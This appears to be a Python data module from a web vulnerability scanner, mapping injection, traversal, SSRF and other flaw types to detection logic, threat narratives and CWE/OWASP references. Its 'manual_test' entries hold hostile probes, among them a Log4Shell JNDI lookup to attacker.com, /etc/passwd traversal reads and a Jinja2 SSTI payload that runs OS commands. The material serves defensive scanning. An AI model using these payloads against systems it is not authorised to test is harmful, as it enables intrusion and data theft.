"""Comprehensive Vulnerability Intelligence Database.

Maps all 23 vulnerability types to:
- Source code file/function/lines where detection logic lives
- Detection logic summary
- Threat scenario narrative (WHY it was tested, attack story)
- Threat actor profile
- Attack complexity (LOW / MEDIUM / HIGH)
- Business impact categories
- OWASP Top 10 mapping
- STRIDE threat model category
- CWE ID
- Real-world breach examples
- OS relevance
- Remediation priority
"""

from typing import Any, Dict

# Source file constant — all checks live in the same scanner module
_SRC = "suite-core/core/real_scanner.py"

VULN_TYPE_INTEL: Dict[str, Dict[str, Any]] = {
    "sql_injection": {
        "source_file": _SRC,
        "source_function": "_check_sql_injection",
        "source_lines": "614-682",
        "detection_logic": "Sends benign SQL injection payloads (e.g. ' OR '1'='1) as query parameters, then performs differential analysis comparing baseline response vs injected response. Detects SQL error patterns from MySQL, PostgreSQL, Oracle, MSSQL, SQLite in response body.",
        "threat_scenario": "An attacker crafts a malicious SQL query in a user input field (login form, search bar, URL parameter). If the application concatenates user input directly into SQL queries without parameterization, the attacker can extract the entire database, modify records, or execute OS commands via xp_cmdshell / LOAD_FILE().",
        "threat_actor": "Script kiddie to APT — automated tools (sqlmap) make this trivial",
        "attack_complexity": "LOW",
        "business_impact": [
            "Data breach",
            "Full database compromise",
            "Authentication bypass",
            "Regulatory fines (GDPR/PCI-DSS)",
            "Reputation damage",
        ],
        "owasp_top10": "A03:2021 – Injection",
        "stride": "Tampering, Information Disclosure, Elevation of Privilege",
        "cwe": "CWE-89",
        "real_world_examples": [
            "Equifax breach (2017) — 147M records via Apache Struts SQLi",
            "Heartland Payment Systems (2008) — 130M credit cards",
            "TalkTalk (2015) — 157K customer records via SQLi",
        ],
        "os_relevance": "All — SQL injection is application-layer, OS-independent",
        "remediation_priority": "CRITICAL",
        "manual_test": "curl '{url}?id=1%27%20OR%20%271%27%3D%271' -s | grep -iE '(sql|mysql|postgres|oracle|syntax)'",
    },
    "xss": {
        "source_file": _SRC,
        "source_function": "_check_xss",
        "source_lines": "684-746",
        "detection_logic": "Injects unique canary token (<script>aldeci_{random}</script>) into URL parameters. Uses differential analysis: compares response with benign vs XSS payload. Checks if canary is reflected unescaped in response body.",
        "threat_scenario": "An attacker injects JavaScript code into a web page that is viewed by other users. The malicious script runs in the victim's browser, stealing session cookies, redirecting to phishing sites, or modifying page content (e.g., fake login forms). Stored XSS persists across sessions.",
        "threat_actor": "Script kiddie to organized crime — used in phishing campaigns and watering hole attacks",
        "attack_complexity": "LOW",
        "business_impact": [
            "Session hijacking",
            "Credential theft",
            "Defacement",
            "Malware distribution",
            "Compliance violations",
        ],
        "owasp_top10": "A03:2021 – Injection (A07:2017 – XSS)",
        "stride": "Tampering, Spoofing, Information Disclosure",
        "cwe": "CWE-79",
        "real_world_examples": [
            "British Airways (2018) — Magecart XSS skimmed 380K payment cards",
            "eBay XSS (2015–2017) — persistent XSS in item listings",
            "Fortnite (2019) — XSS in Epic Games subdomain leading to account takeover",
        ],
        "os_relevance": "All — client-side vulnerability, browser-dependent",
        "remediation_priority": "HIGH",
        "manual_test": "curl '{url}?q=<script>alert(1)</script>' -s | grep '<script>alert'",
    },
    "security_headers": {
        "source_file": _SRC,
        "source_function": "_check_security_headers",
        "source_lines": "490-571",
        "detection_logic": "Fetches target URL and checks for presence/correctness of critical HTTP security headers: X-Frame-Options, X-Content-Type-Options, Strict-Transport-Security (HSTS), Content-Security-Policy (CSP), Referrer-Policy, Permissions-Policy. Context-aware: skips HTML-only headers for JSON API responses.",
        "threat_scenario": "Without proper security headers, the browser allows dangerous defaults: clickjacking via iframe embedding (no X-Frame-Options), MIME-type confusion attacks (no X-Content-Type-Options), SSL stripping (no HSTS), and unrestricted resource loading (no CSP). These enable man-in-the-middle attacks and content injection.",
        "threat_actor": "Opportunistic attacker to nation-state — often exploited as part of a chain",
        "attack_complexity": "LOW",
        "business_impact": [
            "Clickjacking attacks",
            "SSL downgrade attacks",
            "Content injection",
            "Data exfiltration via XSS",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Tampering, Information Disclosure",
        "cwe": "CWE-693",
        "real_world_examples": [
            "Missing HSTS enabled SSL stripping in banking apps (numerous)",
            "Clickjacking via missing X-Frame-Options on social media login pages",
        ],
        "os_relevance": "All — HTTP header configuration is server-side",
        "remediation_priority": "MEDIUM",
        "manual_test": "curl -sI '{url}' | grep -iE '(x-frame|x-content-type|strict-transport|content-security-policy)'",
    },
    "ssl_tls": {
        "source_file": _SRC,
        "source_function": "_check_ssl_tls",
        "source_lines": "573-612",
        "detection_logic": "Extracts SSL/TLS certificate from target using Python ssl module. Checks certificate validity dates, subject, issuer. Flags expired certificates, self-signed certs, weak protocols.",
        "threat_scenario": "Expired or misconfigured SSL/TLS allows man-in-the-middle attacks where an attacker intercepts and modifies traffic between user and server. Users may be tricked into accepting invalid certificates, exposing credentials and sensitive data in transit.",
        "threat_actor": "Nation-state, ISP-level attacker, rogue WiFi operator",
        "attack_complexity": "MEDIUM",
        "business_impact": [
            "Data interception",
            "Credential theft",
            "Session hijacking",
            "Regulatory non-compliance (PCI-DSS 4.1)",
        ],
        "owasp_top10": "A02:2021 – Cryptographic Failures",
        "stride": "Information Disclosure, Tampering",
        "cwe": "CWE-295",
        "real_world_examples": [
            "DigiNotar breach (2011) — forged Google SSL certs",
            "Superfish/Lenovo (2015) — MITM via pre-installed root CA",
            "Let's Encrypt certificate expiry incidents",
        ],
        "os_relevance": "All — TLS is transport-layer",
        "remediation_priority": "HIGH",
        "manual_test": "echo | openssl s_client -connect {host}:443 -servername {host} 2>/dev/null | openssl x509 -noout -dates -subject",
    },
    "information_disclosure": {
        "source_file": _SRC,
        "source_function": "_check_information_disclosure",
        "source_lines": "748-793",
        "detection_logic": "Probes common paths (/robots.txt, /.env, /.git/HEAD, /server-status, /phpinfo.php, /wp-config.php.bak, /api/debug). Flags exposed sensitive files, server status pages, debug endpoints, and backup files that reveal internal architecture.",
        "threat_scenario": "Exposed configuration files (.env, .git) leak database credentials, API keys, and internal architecture details. An attacker uses this information to plan targeted attacks — directly accessing databases with leaked credentials or exploiting known vulnerabilities in disclosed software versions.",
        "threat_actor": "Automated scanner (Shodan, Censys) to targeted attacker",
        "attack_complexity": "LOW",
        "business_impact": [
            "Credential exposure",
            "Source code leak",
            "Architecture disclosure aids further attacks",
            "API key abuse",
        ],
        "owasp_top10": "A01:2021 – Broken Access Control",
        "stride": "Information Disclosure",
        "cwe": "CWE-200",
        "real_world_examples": [
            "Uber .git exposure (2016) — source code leaked",
            "Capital One (2019) — SSRF + info disclosure led to 100M records",
            "Numerous .env file exposures on Shodan",
        ],
        "os_relevance": "All — path-based, OS-independent",
        "remediation_priority": "HIGH",
        "manual_test": "for p in /.env /.git/HEAD /server-status /robots.txt; do echo \"--- $p ---\"; curl -s '{url}$p' | head -5; done",
    },
    "path_traversal": {
        "source_file": _SRC,
        "source_function": "_check_path_traversal",
        "source_lines": "795-843",
        "detection_logic": "Tests directory traversal payloads (../../etc/passwd, ..\\windows\\win.ini) via URL parameters and path segments. Checks response for OS-specific file content signatures (root:x:0:0 for Linux, [fonts] for Windows).",
        "threat_scenario": "An attacker uses ../ sequences to escape the web root directory and read arbitrary files from the server. On Linux, /etc/passwd reveals user accounts; /etc/shadow exposes password hashes. On Windows, web.config exposes connection strings. This can escalate to full system compromise.",
        "threat_actor": "Script kiddie to APT — automated tools available",
        "attack_complexity": "LOW",
        "business_impact": [
            "Source code theft",
            "Credential exposure",
            "Configuration file access",
            "System compromise",
        ],
        "owasp_top10": "A01:2021 – Broken Access Control",
        "stride": "Information Disclosure, Elevation of Privilege",
        "cwe": "CWE-22",
        "real_world_examples": [
            "Fortinet FortiOS path traversal (CVE-2018-13379) — VPN credentials",
            "Citrix ADC (CVE-2019-19781) — arbitrary file read → RCE",
            "Apache HTTP Server path traversal (CVE-2021-41773)",
        ],
        "os_relevance": "Linux (../../etc/passwd), Windows (..\\windows\\win.ini) — OS-specific payloads",
        "remediation_priority": "CRITICAL",
        "manual_test": "curl -s '{url}/../../../../etc/passwd' | head -3 && curl -s '{url}?file=../../etc/passwd' | head -3",
    },
    "cors_misconfiguration": {
        "source_file": _SRC,
        "source_function": "_check_cors_misconfiguration",
        "source_lines": "845-875",
        "detection_logic": "Sends request with malicious Origin header (https://evil.example.com). Checks if server reflects the origin in Access-Control-Allow-Origin and whether Access-Control-Allow-Credentials is true. A reflected origin with credentials = exploitable CORS.",
        "threat_scenario": "A misconfigured CORS policy allows any website to make authenticated cross-origin requests. An attacker hosts a malicious page that reads the victim's data from the vulnerable API while the victim is logged in. If credentials are allowed, the attacker can steal session tokens, personal data, and perform actions as the user.",
        "threat_actor": "Phishing operator, organized crime",
        "attack_complexity": "LOW",
        "business_impact": [
            "Cross-origin data theft",
            "Session token exposure",
            "Account takeover via CSRF-like attacks",
            "API abuse",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Information Disclosure, Spoofing",
        "cwe": "CWE-942",
        "real_world_examples": [
            "Bitcoin exchanges with permissive CORS leaked user balances",
            "CORS misconfiguration in numerous SaaS APIs exposing customer data",
        ],
        "os_relevance": "All — CORS is HTTP-layer configuration",
        "remediation_priority": "HIGH",
        "manual_test": "curl -sI -H 'Origin: https://evil.com' '{url}' | grep -i 'access-control'",
    },
    "cookie_security": {
        "source_file": _SRC,
        "source_function": "_check_cookie_security",
        "source_lines": "877-910",
        "detection_logic": "Parses Set-Cookie headers from response. Checks each cookie for Secure flag (HTTPS-only transmission), HttpOnly flag (JavaScript inaccessible), and SameSite attribute (CSRF protection). Flags cookies missing any of these protections.",
        "threat_scenario": "Without Secure flag, cookies transmit over HTTP — an attacker on the same WiFi network can intercept session tokens via passive sniffing. Without HttpOnly, XSS can steal cookies via document.cookie. Without SameSite, cross-site requests carry authentication cookies enabling CSRF attacks.",
        "threat_actor": "Network-level attacker (WiFi sniffer), XSS exploiter, CSRF attacker",
        "attack_complexity": "LOW",
        "business_impact": [
            "Session hijacking",
            "Account takeover",
            "Cross-site request forgery",
            "Credential theft over insecure networks",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Spoofing, Information Disclosure",
        "cwe": "CWE-614",
        "real_world_examples": [
            "Firesheep (2010) — WiFi session hijacking via missing Secure flag",
            "Numerous CSRF attacks via missing SameSite on banking apps",
        ],
        "os_relevance": "All — cookie security is browser/HTTP-layer",
        "remediation_priority": "HIGH",
        "manual_test": "curl -sI '{url}' | grep -i 'set-cookie'",
    },
    "http_method_exposure": {
        "source_file": _SRC,
        "source_function": "_check_http_methods",
        "source_lines": "912-938",
        "detection_logic": "Sends OPTIONS request and reads Allow / Access-Control-Allow-Methods headers. Flags TRACE (enables XST — Cross-Site Tracing), PUT (file upload), DELETE (data destruction), and CONNECT (proxy tunneling) as dangerous methods.",
        "threat_scenario": "TRACE method reflects request headers including cookies — combined with XSS, this becomes Cross-Site Tracing (XST) bypassing HttpOnly. PUT allows uploading web shells. DELETE can destroy resources. These are common in misconfigured web servers left on default settings.",
        "threat_actor": "Automated scanner to targeted attacker",
        "attack_complexity": "LOW",
        "business_impact": [
            "Web shell upload via PUT",
            "Data destruction via DELETE",
            "HttpOnly bypass via TRACE (XST)",
            "Proxy abuse via CONNECT",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Tampering, Elevation of Privilege",
        "cwe": "CWE-749",
        "real_world_examples": [
            "IIS default config with WebDAV exposing PUT/DELETE",
            "Apache TRACE enabled leading to XST attacks",
        ],
        "os_relevance": "All — HTTP method configuration is server-side",
        "remediation_priority": "MEDIUM",
        "manual_test": "curl -sI -X OPTIONS '{url}' | grep -iE '(allow|access-control-allow-methods)'",
    },
    "technology_fingerprint": {
        "source_file": _SRC,
        "source_function": "_check_technology_fingerprinting",
        "source_lines": "940-990",
        "detection_logic": "Reads Server, X-Powered-By, X-AspNet-Version, X-Generator headers. Scans response body for framework-specific patterns: WordPress (wp-content), Drupal, Django (csrfmiddlewaretoken), Laravel (laravel_session), React (__react), Angular (ng-version), Vue.js (data-v-), Next.js (__next), etc.",
        "threat_scenario": "Knowing the exact technology stack (e.g., Apache 2.4.49, PHP 7.4.3, WordPress 5.8) allows an attacker to search for known CVEs specific to those versions. Version disclosure turns a generic target into a targeted attack — the attacker knows exactly which exploits to use.",
        "threat_actor": "Automated reconnaissance (Wappalyzer, WhatWeb, Shodan) to APT",
        "attack_complexity": "LOW",
        "business_impact": [
            "Targeted exploitation using version-specific CVEs",
            "Reduced attacker effort",
            "Supply chain attack surface mapping",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Information Disclosure",
        "cwe": "CWE-200",
        "real_world_examples": [
            "Server header disclosure led to targeted Apache Struts exploitation (Equifax)",
            "WordPress version fingerprinting enables automated mass exploitation",
        ],
        "os_relevance": "All — technology fingerprinting is application-layer",
        "remediation_priority": "LOW",
        "manual_test": "curl -sI '{url}' | grep -iE '(server|x-powered-by|x-aspnet|x-generator)'",
    },
    "waf_detection": {
        "source_file": _SRC,
        "source_function": "_check_waf_detection",
        "source_lines": "992-1040",
        "detection_logic": "Two-phase detection: (1) Header-based — checks for Cloudflare (cf-ray), AWS WAF (x-amzn-requestid), Akamai, Imperva/Incapsula, Sucuri, F5 BIG-IP, Barracuda, ModSecurity indicators. (2) Behavior-based — sends attack payload (?id=1' OR 1=1--&<script>alert(1)</script>) and checks if response is blocked (403/406/429/503) while baseline was 200.",
        "threat_scenario": "WAF detection is informational — knowing a WAF exists helps the attacker choose WAF bypass techniques. Cloudflare, AWS WAF, and Akamai each have known bypass methods. Conversely, WAF presence indicates defense-in-depth investment. Absence means the application is the last line of defense.",
        "threat_actor": "Sophisticated attacker mapping defense layers",
        "attack_complexity": "MEDIUM",
        "business_impact": [
            "WAF bypass planning",
            "Attack surface understanding",
            "Defense-in-depth assessment",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration (informational)",
        "stride": "Information Disclosure",
        "cwe": "CWE-693",
        "real_world_examples": [
            "Cloudflare bypass via origin IP disclosure",
            "AWS WAF bypass via Unicode normalization",
            "ModSecurity rule evasion via encoding tricks",
        ],
        "os_relevance": "All — WAF is network-layer appliance",
        "remediation_priority": "LOW",
        "manual_test": "curl -sI '{url}' | grep -iE '(cf-ray|x-amzn|akamai|incapsula|sucuri|bigip)' && curl -s '{url}?id=1%27+OR+1%3D1--' -o /dev/null -w '%{{http_code}}'",
    },
    "open_redirect": {
        "source_file": _SRC,
        "source_function": "_check_open_redirect",
        "source_lines": "1042-1073",
        "detection_logic": "Tests 12 common redirect parameters (url, redirect, next, dest, destination, redir, redirect_uri, return, returnTo, go, target, link, out) with evil.example.com as destination. Checks for 301/302/303/307/308 responses where Location header contains the evil domain. Disables follow_redirects to inspect raw response.",
        "threat_scenario": "An attacker crafts a URL like https://trusted-bank.com/login?redirect=https://evil-phish.com. Victims see the trusted domain and click. After login, they're redirected to the attacker's site which mimics the bank, stealing credentials. Open redirects are used in OAuth token theft and phishing campaigns.",
        "threat_actor": "Phishing operator, OAuth attacker",
        "attack_complexity": "LOW",
        "business_impact": [
            "Phishing amplification (trusted domain)",
            "OAuth token theft",
            "Credential harvesting",
            "Reputation damage",
        ],
        "owasp_top10": "A01:2021 – Broken Access Control",
        "stride": "Spoofing",
        "cwe": "CWE-601",
        "real_world_examples": [
            "Google Open Redirect used in phishing campaigns",
            "Facebook OAuth open redirect for token theft (2013)",
            "HackerOne reports on open redirects in Fortune 500 companies",
        ],
        "os_relevance": "All — application-layer redirect handling",
        "remediation_priority": "MEDIUM",
        "manual_test": "curl -sI '{url}?redirect=https://evil.example.com' | grep -i 'location'",
    },
    "crlf_injection": {
        "source_file": _SRC,
        "source_function": "_check_crlf_injection",
        "source_lines": "1075-1108",
        "detection_logic": "Injects CRLF sequences (%0d%0a) followed by custom headers (X-Injected: true, Set-Cookie: crlf=injected) into URL query parameters. Checks if injected headers appear in the response. Uses URL-encoded and literal \\r\\n variants.",
        "threat_scenario": "CRLF injection splits HTTP responses — the attacker injects new headers or even a full response body. This enables: cache poisoning (inject Cache-Control), session fixation (inject Set-Cookie), XSS (inject HTML body), and response splitting attacks against downstream proxies/caches.",
        "threat_actor": "Skilled attacker, web cache poisoner",
        "attack_complexity": "MEDIUM",
        "business_impact": [
            "HTTP response splitting",
            "Cache poisoning",
            "Session fixation",
            "Cross-site scripting via header injection",
        ],
        "owasp_top10": "A03:2021 – Injection",
        "stride": "Tampering, Spoofing",
        "cwe": "CWE-93",
        "real_world_examples": [
            "Twitter CRLF injection in redirect (2019)",
            "Shopify CRLF injection bounty reports",
            "Node.js HTTP response splitting via Unicode (CVE-2016-5325)",
        ],
        "os_relevance": "All — HTTP-layer vulnerability",
        "remediation_priority": "HIGH",
        "manual_test": "curl -sI '{url}?q=%0d%0aX-Injected:%20true' | grep -i 'x-injected'",
    },
    "api_exposure": {
        "source_file": _SRC,
        "source_function": "_check_api_endpoint_discovery",
        "source_lines": "1110-1165",
        "detection_logic": "Probes 35+ common API paths: /api/v1-v3, /graphql, /swagger*, /openapi.json, /docs, /redoc, /actuator/*, /debug/*, /metrics, /health*, /admin*, /.env, /config*, /server-status, /phpinfo.php. Categorizes discovered endpoints as sensitive (debug, admin, actuator/env, phpinfo, swagger, graphiql) or informational.",
        "threat_scenario": "Exposed API documentation (/swagger, /graphql) reveals all available endpoints, parameters, and data models — a complete roadmap for attackers. Debug endpoints (/actuator/env, /debug/vars) leak environment variables including database credentials and API keys. Admin panels without authentication grant full system control.",
        "threat_actor": "Automated scanner to targeted attacker",
        "attack_complexity": "LOW",
        "business_impact": [
            "API surface disclosure",
            "Credential exposure via debug endpoints",
            "Unauthorized admin access",
            "Full system compromise via exposed management interfaces",
        ],
        "owasp_top10": "A01:2021 – Broken Access Control",
        "stride": "Information Disclosure, Elevation of Privilege",
        "cwe": "CWE-200",
        "real_world_examples": [
            "Spring Boot Actuator exposures leaking env vars (widespread)",
            "GraphQL introspection exposing entire schema",
            "Exposed Kubernetes dashboards leading to cluster takeover",
        ],
        "os_relevance": "All — API endpoint exposure is application-layer",
        "remediation_priority": "HIGH",
        "manual_test": "for p in /api /swagger /docs /graphql /actuator/env /debug /admin /.env; do echo \"$p: $(curl -s -o /dev/null -w '%{http_code}' '{url}$p')\"; done",
    },
    "ssti": {
        "source_file": _SRC,
        "source_function": "_check_ssti",
        "source_lines": "1167-1231",
        "detection_logic": "Differential math evaluation: injects template expressions ({{7*7}}, ${7*7}, <%=7*7%>, {{7*'7'}}, #{7*7}) into URL parameters. Compares against benign baseline. Only flags if the computed result (49 or 7777777) appears in the response but NOT in the benign baseline — confirms server-side template evaluation.",
        "threat_scenario": "If a template engine evaluates user input, the attacker escalates from math to OS commands: {{config.__class__.__init__.__globals__['os'].popen('id').read()}} in Jinja2. This achieves Remote Code Execution (RCE) — complete server compromise from a single URL parameter. SSTI is often the shortest path from input to root shell.",
        "threat_actor": "Skilled attacker to APT — requires template engine knowledge",
        "attack_complexity": "MEDIUM",
        "business_impact": [
            "Remote code execution",
            "Complete server compromise",
            "Data exfiltration",
            "Lateral movement in network",
        ],
        "owasp_top10": "A03:2021 – Injection",
        "stride": "Tampering, Elevation of Privilege",
        "cwe": "CWE-1336",
        "real_world_examples": [
            "Uber SSTI in Jinja2 (HackerOne report, $10K bounty)",
            "Shopify SSTI via Liquid template engine",
            "Portswigger research on SSTI exploitation chains",
        ],
        "os_relevance": "All — but payload syntax varies by template engine (Jinja2/Twig/Freemarker/ERB)",
        "remediation_priority": "CRITICAL",
        "manual_test": "curl -s '{url}?q={{{{7*7}}}}' | grep '49'",
    },
    "http_request_smuggling": {
        "source_file": _SRC,
        "source_function": "_check_http_request_smuggling",
        "source_lines": "1233-1291",
        "detection_logic": "Two probes: (1) CL.TE conflict — sends POST with both Content-Length: 4 and Transfer-Encoding: chunked. A secure server rejects this (400). (2) TE.TE obfuscation — sends duplicate Transfer-Encoding headers with different casing. Only flags if BOTH probes indicate susceptibility (requires 2+ indicators).",
        "threat_scenario": "When a front-end proxy and back-end server disagree on request boundaries (Content-Length vs Transfer-Encoding), an attacker smuggles a hidden request inside a legitimate one. This can: bypass WAF rules, poison web caches, hijack other users' requests, and steal credentials. One of the most dangerous web vulnerabilities when exploitable.",
        "threat_actor": "Advanced attacker — requires proxy/CDN chain knowledge",
        "attack_complexity": "HIGH",
        "business_impact": [
            "WAF bypass",
            "Cache poisoning affecting all users",
            "Request hijacking (stealing other users' data)",
            "Credential theft",
            "Virtual host routing manipulation",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Tampering, Spoofing, Information Disclosure",
        "cwe": "CWE-444",
        "real_world_examples": [
            "PayPal HTTP smuggling (2019, $20K bounty)",
            "Capital One via CDN smuggling",
            "James Kettle research — widespread in Akamai/CloudFront chains",
        ],
        "os_relevance": "All — depends on proxy/server chain, not OS",
        "remediation_priority": "CRITICAL",
        "manual_test": "curl -s -X POST '{url}' -H 'Transfer-Encoding: chunked' -H 'Content-Length: 4' -d '0\\r\\n\\r\\n' -o /dev/null -w '%{http_code}'",
    },
    "host_header_injection": {
        "source_file": _SRC,
        "source_function": "_check_host_header_injection",
        "source_lines": "1293-1331",
        "detection_logic": "Differential analysis: (1) Sends baseline request with legitimate Host. (2) Sends request with Host: aldeci-evil.example.com. (3) Only flags if the evil host appears in the response body but NOT in the baseline response — confirms the server uses the Host header to generate content (URLs, links, forms).",
        "threat_scenario": "If the application uses the Host header to build URLs (password reset links, canonical URLs, redirects), an attacker can: (1) Send password reset email containing attacker's domain — victim clicks, token goes to attacker. (2) Poison web cache with attacker-controlled links. (3) Perform SSRF via internal host routing.",
        "threat_actor": "Phishing operator, cache poisoner, SSRF attacker",
        "attack_complexity": "LOW",
        "business_impact": [
            "Password reset hijacking",
            "Cache poisoning",
            "SSRF via internal routing",
            "Phishing via manipulated links",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Spoofing, Tampering",
        "cwe": "CWE-644",
        "real_world_examples": [
            "Django password reset host header injection (multiple reports)",
            "Practical Host Header Attacks by James Kettle (PortSwigger)",
            "WordPress host header injection for cache poisoning",
        ],
        "os_relevance": "All — application-layer, framework-dependent",
        "remediation_priority": "HIGH",
        "manual_test": "curl -s -H 'Host: evil.example.com' '{url}' | grep -i 'evil.example.com'",
    },
    "deserialization": {
        "source_file": _SRC,
        "source_function": "_check_deserialization",
        "source_lines": "1333-1387",
        "detection_logic": "Two-phase detection: (1) Content negotiation — sends Accept: application/x-java-serialized-object and application/x-python-serialize to check if server responds with serialized content types. (2) Endpoint probing — checks for JBoss JMXInvokerServlet, EJBInvokerServlet, jmx-console, _session endpoints that accept serialized objects.",
        "threat_scenario": "Java/Python deserialization vulnerabilities allow Remote Code Execution by sending a crafted serialized object. The server deserializes it, triggering gadget chains (e.g., Apache Commons Collections) that execute arbitrary commands. This is one of the most severe web vulnerability classes — a single POST request can compromise the entire server.",
        "threat_actor": "Skilled attacker to APT — requires gadget chain knowledge (ysoserial/marshalsec)",
        "attack_complexity": "MEDIUM",
        "business_impact": [
            "Remote code execution",
            "Complete server compromise",
            "Data exfiltration",
            "Ransomware deployment",
        ],
        "owasp_top10": "A08:2021 – Software and Data Integrity Failures",
        "stride": "Tampering, Elevation of Privilege",
        "cwe": "CWE-502",
        "real_world_examples": [
            "Apache Struts CVE-2017-9805 (deserialization RCE)",
            "Jenkins deserialization (CVE-2016-0792)",
            "WebLogic deserialization (CVE-2019-2725, CVE-2020-14882)",
        ],
        "os_relevance": "Primarily Java (JBoss, WebLogic, Tomcat) and Python (pickle) — OS-independent",
        "remediation_priority": "CRITICAL",
        "manual_test": "curl -sI -H 'Accept: application/x-java-serialized-object' '{url}' | grep -i 'content-type' && curl -s -o /dev/null -w '%{http_code}' '{url}/invoker/JMXInvokerServlet'",
    },
    "cache_poisoning": {
        "source_file": _SRC,
        "source_function": "_check_cache_poisoning",
        "source_lines": "1389-1447",
        "detection_logic": "Differential reflection: (1) Gets baseline response. (2) Sends requests with unkeyed headers (X-Forwarded-Host, X-Forwarded-Scheme, X-Original-URL, X-Rewrite-URL) containing canary values. (3) Checks if canary appears in response body or headers where it wasn't in baseline. Unkeyed header reflection + cache = mass poisoning.",
        "threat_scenario": "The attacker sends a request with X-Forwarded-Host: evil.com. The server includes this in generated URLs/links. If a CDN/cache stores this response, ALL subsequent users receive the poisoned response with attacker-controlled links — redirecting to phishing sites, injecting scripts, or serving malware. One request can affect millions of users.",
        "threat_actor": "Advanced attacker targeting CDN/cache chains",
        "attack_complexity": "HIGH",
        "business_impact": [
            "Mass phishing via poisoned cache",
            "XSS affecting all cached users",
            "SEO poisoning",
            "Credential harvesting at scale",
        ],
        "owasp_top10": "A05:2021 – Security Misconfiguration",
        "stride": "Tampering, Information Disclosure",
        "cwe": "CWE-349",
        "real_world_examples": [
            "Web Cache Poisoning research by James Kettle (PortSwigger)",
            "CloudFront/S3 cache poisoning via X-Forwarded-Host",
            "HackerOne cache poisoning reports on major platforms",
        ],
        "os_relevance": "All — depends on CDN/cache configuration, not OS",
        "remediation_priority": "HIGH",
        "manual_test": "curl -s -H 'X-Forwarded-Host: evil-canary.com' '{url}' | grep -i 'evil-canary'",
    },
    "command_injection": {
        "source_file": "suite-core/core/cve_tester.py",
        "source_function": "test_cve (CVE-specific tests)",
        "source_lines": "N/A — detected via CVE-specific tests",
        "detection_logic": "Tested through CVE-specific exploit modules (e.g., Log4Shell CVE-2021-44228 sends ${jndi:ldap://...} payloads, Spring4Shell CVE-2022-22965 sends class.module.classLoader payloads). Each CVE test targets the specific injection vector for that vulnerability.",
        "threat_scenario": "Command injection allows an attacker to execute arbitrary OS commands on the server. Whether via Log4Shell (JNDI lookup → remote class loading → RCE), Spring4Shell (classLoader manipulation → web shell), or direct shell injection (;id, |cat /etc/passwd), the result is full server control — data theft, ransomware, lateral movement.",
        "threat_actor": "Script kiddie to nation-state — automated exploitation tools available for most CVEs",
        "attack_complexity": "LOW to MEDIUM",
        "business_impact": [
            "Remote code execution",
            "Complete infrastructure compromise",
            "Data exfiltration",
            "Ransomware deployment",
            "Supply chain attacks",
        ],
        "owasp_top10": "A03:2021 – Injection",
        "stride": "Tampering, Elevation of Privilege",
        "cwe": "CWE-78",
        "real_world_examples": [
            "Log4Shell (CVE-2021-44228) — most exploited vulnerability of 2021-2022",
            "Shellshock (CVE-2014-6271) — Bash command injection",
            "Spring4Shell (CVE-2022-22965) — Java classLoader RCE",
        ],
        "os_relevance": "Linux (bash/sh payloads), Windows (cmd/powershell payloads) — OS-specific commands",
        "remediation_priority": "CRITICAL",
        "manual_test": "curl -s -H 'X-Api-Version: ${jndi:ldap://attacker.com/a}' '{url}' (Log4Shell) or curl -s '{url}?cmd=id' (generic)",
    },
    "authentication_bypass": {
        "source_file": "suite-core/core/cve_tester.py",
        "source_function": "test_cve (CVE-specific tests)",
        "source_lines": "N/A — detected via CVE-specific tests",
        "detection_logic": "Tested through CVE-specific tests targeting authentication bypass vulnerabilities (e.g., Fortinet CVE-2022-40684 uses X-Forwarded-For header manipulation, Cisco IOS XE CVE-2023-20198 targets the web UI). Each test probes specific bypass vectors for the target product.",
        "threat_scenario": "Authentication bypass grants an unauthenticated attacker full admin access to the system. In network devices (Fortinet, Cisco), this means firewall/VPN control — the attacker can disable security, create backdoor accounts, and pivot into the internal network. No credentials needed.",
        "threat_actor": "Nation-state (Volt Typhoon, APT28) to ransomware gang — critical infrastructure targeting",
        "attack_complexity": "LOW",
        "business_impact": [
            "Full admin access without credentials",
            "Network device takeover",
            "Firewall/VPN bypass",
            "Internal network pivot",
            "Mass exploitation of exposed devices",
        ],
        "owasp_top10": "A07:2021 – Identification and Authentication Failures",
        "stride": "Spoofing, Elevation of Privilege",
        "cwe": "CWE-287",
        "real_world_examples": [
            "Fortinet FortiOS auth bypass (CVE-2022-40684) — exploited in the wild",
            "Citrix Bleed (CVE-2023-4966) — session token leakage",
            "Cisco IOS XE (CVE-2023-20198) — 0-day mass exploitation",
        ],
        "os_relevance": "Appliance-specific (FortiOS, IOS XE, Citrix ADC) — not OS-dependent",
        "remediation_priority": "CRITICAL",
        "manual_test": "curl -s -H 'Forwarded: for=127.0.0.1' '{url}/api/v2/cmdb/system/admin' (Fortinet) or check vendor advisory",
    },
    "ssrf": {
        "source_file": "suite-core/core/cve_tester.py",
        "source_function": "test_cve (CVE-specific tests)",
        "source_lines": "N/A — detected via CVE-specific tests",
        "detection_logic": "Tested through CVE-specific modules that probe for Server-Side Request Forgery. Tests attempt to make the target server fetch internal resources (http://169.254.169.254/latest/meta-data/ for AWS, http://localhost/admin for internal services). Detected via out-of-band callbacks or response content analysis.",
        "threat_scenario": "SSRF turns the vulnerable server into a proxy for the attacker. In cloud environments, this accesses the metadata service (169.254.169.254) to steal IAM credentials — leading to full cloud account takeover. In internal networks, SSRF reaches services not exposed to the internet (databases, admin panels, Kubernetes API).",
        "threat_actor": "Cloud attacker, internal network pivoting specialist",
        "attack_complexity": "MEDIUM",
        "business_impact": [
            "Cloud credential theft (IAM roles)",
            "Internal service access",
            "Database access via internal URLs",
            "Kubernetes cluster compromise",
            "Full cloud account takeover",
        ],
        "owasp_top10": "A10:2021 – Server-Side Request Forgery (SSRF)",
        "stride": "Information Disclosure, Elevation of Privilege",
        "cwe": "CWE-918",
        "real_world_examples": [
            "Capital One breach (2019) — SSRF + IAM role → 100M records",
            "GitLab SSRF (CVE-2021-22214)",
            "Numerous HackerOne SSRF reports on AWS-hosted apps",
        ],
        "os_relevance": "Cloud-specific (AWS/GCP/Azure metadata) — Linux/Windows both vulnerable",
        "remediation_priority": "CRITICAL",
